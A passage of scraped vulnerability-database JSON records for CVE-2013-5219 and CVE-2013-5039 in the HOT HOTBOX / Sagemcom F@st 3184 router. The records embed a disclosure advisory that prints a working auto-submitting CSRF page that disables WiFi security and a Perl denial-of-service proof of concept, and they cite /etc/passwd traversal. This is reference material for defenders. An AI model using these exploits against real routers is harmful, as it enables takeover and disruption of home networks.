"exploitabilityScore": 6.5,
"id": "CNVD-2014-00019",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-65221",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5219",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2013-5219",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNVD",
"id": "CNVD-2014-00019",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-564",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-65221",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "VULHUB",
"id": "VHN-65221"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of |\n| HOT Cable communication company in israel. |\n| The Appliance is manufactured by SAGEMCOM |\n| and carries the model name F@st 3184. |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities |\n+--------------------+---------------------------------------------------------+\n| Release Date | 2013/09/09 |\n| Researcher | Oz Elisyan |\n+--------------------+---------------------------------------------------------+\n| System Affected | HOTBOX Router/Modem |\n| Versions Affected | 2.1.11 , possibly earlier |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |\n| CVE-2013-5039 |\n| Vendor Patched | N/A |\n| Classification | 0-day |\n| Exploits | http://elisyan.com/hotboxDoS.pl, |\n| http://elisyan.com/hotboxCSRF.html |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5219"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "VULHUB",
"id": "VHN-65221"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65221",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65221"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5219",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "123901",
"trust": 3.2
},
{
"db": "BID",
"id": "63550",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-564",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00019",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "29518",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65221",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "VULHUB",
"id": "VHN-65221"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"id": "VAR-201312-0375",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "VULHUB",
"id": "VHN-65221"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
}
]
},
"last_update_date": "2025-04-11T22:48:26.868000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.hot.net.il/heb/Main/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65221"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
},
{
"trust": 2.4,
"url": "http://www.youtube.com/watch?v=cplt09zij48"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5219"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5219"
},
{
"trust": 0.3,
"url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/nov/17"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
},
{
"trust": 0.1,
"url": "http://$host/goform/login\";"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxcsrf.html"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxdos.pl,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "VULHUB",
"id": "VHN-65221"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "VULHUB",
"id": "VHN-65221"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65221"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"date": "2013-11-04T13:03:33",
"db": "PACKETSTORM",
"id": "123901"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"date": "2013-12-30T04:53:07.303000",
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65221"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HOT HOTBOX Router Directory traversal vulnerability in Japanese software",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
}
],
"trust": 0.6
}
}
VAR-201312-0133
Vulnerability from variot - Updated: 2025-04-11 22:48Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+
Vulnerabilities List -
Default WPS Pin
Authentication based on IP Address
DoS via crafted POST
Path/Directory Traversal
Script injection via DHCP request
No CSRF Token
Demo - http://www.youtube.com/watch?v=CPlT09ZIj48
CSRF EXPLOIT:
document.getElementById(1).submit();DENIAL OF SERVICE EXPLOIT:
use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;
Author: Oz Elisyan
Date: 3 September 2013
Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);
print "Done.";
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0133",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "hotbox router",
"scope": "eq",
"trust": 3.0,
"vendor": "hot",
"version": "2.1.11"
},
{
"model": "hotbox router",
"scope": "eq",
"trust": 1.0,
"vendor": "hot",
"version": null
},
{
"model": "hotbox router",
"scope": null,
"trust": 0.8,
"vendor": "hot",
"version": null
},
{
"model": "f@st router",
"scope": "eq",
"trust": 0.3,
"vendor": "sagecom",
"version": "31842.1.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:hot:hotbox_router",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "63550"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 0.4
},
"cve": "CVE-2013-5039",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "CVE-2013-5039",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "CNVD-2014-00017",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "VHN-65041",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5039",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-5039",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-00017",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-562",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-65041",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "VULHUB",
"id": "VHN-65041"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of |\n| HOT Cable communication company in israel. |\n| The Appliance is manufactured by SAGEMCOM |\n| and carries the model name F@st 3184. |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities |\n+--------------------+---------------------------------------------------------+\n| Release Date | 2013/09/09 |\n| Researcher | Oz Elisyan |\n+--------------------+---------------------------------------------------------+\n| System Affected | HOTBOX Router/Modem |\n| Versions Affected | 2.1.11 , possibly earlier |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |\n| CVE-2013-5039 |\n| Vendor Patched | N/A |\n| Classification | 0-day |\n| Exploits | http://elisyan.com/hotboxDoS.pl, |\n| http://elisyan.com/hotboxCSRF.html |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5039"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "VULHUB",
"id": "VHN-65041"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65041",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65041"
}
]
},
"external_ids": {
"@context": {
